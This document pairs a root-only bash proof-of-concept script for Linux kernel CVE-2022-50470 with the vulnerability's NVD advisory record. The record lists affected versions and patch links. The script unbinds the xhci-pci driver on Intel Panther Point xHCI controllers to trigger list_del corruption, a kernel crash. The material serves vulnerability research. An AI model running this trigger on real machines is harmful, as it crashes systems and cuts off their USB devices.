CVE-2022-50470

# CVE-2022-50470 PoC - Trigger list_del corruption in xHCI driver # Affected: Linux kernel with Intel Panther Point PCH (Ivy Bridge) xHCI # This PoC triggers the vulnerability by unbinding xhci-pci driver # while endpoints are still on the bandwidth list. #!/bin/bash # Check if running as root (required for driver manipulation) if [ "$EUID" -ne 0 ]; then echo "This PoC requires root privileges" exit 1 fi # Step 1: Verify Intel Panther Point PCH (Ivy Bridge) xHCI controller # Check for the specific Intel xHCI device (PCI ID 8086:1e31) echo "[*] Checking for Intel Panther Point PCH xHCI controller..." if lspci | grep -q "1e31"; then echo "[+] Vulnerable xHCI controller detected" else echo "[-] Vulnerable controller not found, this may not work" fi # Step 2: Ensure there are USB devices connected to trigger endpoint allocation # The vulnerability requires endpoints to be on the bandwidth list echo "[*] Ensure USB devices are connected to allocate bandwidth endpoints" lsusb # Step 3: Unbind xhci-pci to trigger the vulnerability # This will cause xhci_mem_cleanup() to attempt deleting freed endpoints echo "[*] Triggering vulnerability by unbinding xhci-pci..." echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/unbind 2>/dev/null if [ $? -eq 0 ]; then echo "[+] xhci-pci unbound successfully" echo "[*] Check dmesg for list_del corruption crash" dmesg | tail -20 else echo "[-] Failed to unbind, trying alternative method..." # Alternative: use modprobe to remove the module modprobe -r xhci_pci 2>/dev/null if [ $? -eq 0 ]; then echo "[+] xhci_pci module removed" else echo "[-] Module removal failed - module may be in use" fi fi # Step 4: Rebind to restore functionality (if system survives) sleep 2 echo "0000:00:14.0" > /sys/bus/pci/drivers/xhci_pci/bind 2>/dev/null echo "[*] PoC execution completed"

{"cve": {"id": "CVE-2022-50470", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:42.380", "lastModified": "2026-01-23T16:37:44.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nxhci: Remove device endpoints from bandwidth list when freeing the device\n\nEndpoints are normally deleted from the bandwidth list when they are\ndropped, before the virt device is freed.\n\nIf xHC host is dying or being removed then the endpoints aren't dropped\ncleanly due to functions returning early to avoid interacting with a\nnon-accessible host controller.\n\nSo check and delete endpoints that are still on the bandwidth list when\nfreeing the virt device.\n\nSolves a list_del corruption kernel crash when unbinding xhci-pci,\ncaused by xhci_mem_cleanup() when it later tried to delete already freed\nendpoints from the bandwidth list.\n\nThis only affects hosts that use software bandwidth checking, which\ncurrenty is only the xHC in intel Panther Point PCH (Ivy Bridge)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-415"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.2", "versionEndExcluding": "4.9.332", "matchCriteriaId": "3DE2F2C8-204B-4A2E-BBAA-90AD498BBF94"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.298", "matchCriteriaId": "7140B9A2-EB63-497C-96B1-68A96CD99051"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.264", "matchCriteriaId": "8AE23A9F-BF98-4055-AA49-02118B96226D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.223", "matchCriteriaId": "7FE3F72A-5992-4ABB-A961-F834281060A9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.153", "matchCriteriaId": "62052E35-0E91-4164-BB92-83270CEA0113"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.77", "matchCriteriaId": "756161DE-EFE3-4008-964A-DFE360B188B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.7", "matchCriteriaId": "65D387F0-209C-4EAD-98BA-C4B430A840C9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc1:*:*:*:*:*:*", "matchCriteriaId": "E7E331DA-1FB0-4DEC-91AC-7DA69D461C11"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.1:rc2:*:*:*:*:*:*", "matchCriteriaId": "17F0B248-42CF-4AE6-A469-BB1BAE7F4705"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/3bf860a41e0f2fcea0ac3aae8f7ef887a7994b70", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5aed5b7c2430ce318a8e62f752f181e66f0d1053", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5e4ce28ad907aa54f13b21d5f1dc490525957b0c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/678d2cc2041cc6ce05030852dce9ad42719abcfc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8f1cd9633d1f21efc13e8fc75be8f2b6bb85e38c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/c892a81c7424b4f6a660cb9c249d354ccf3afeca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cebbc8d335d6bcc1316584f779c08f80287c6af8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f0de39474078adef6ece7a183e34c15ce2c1d8d1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}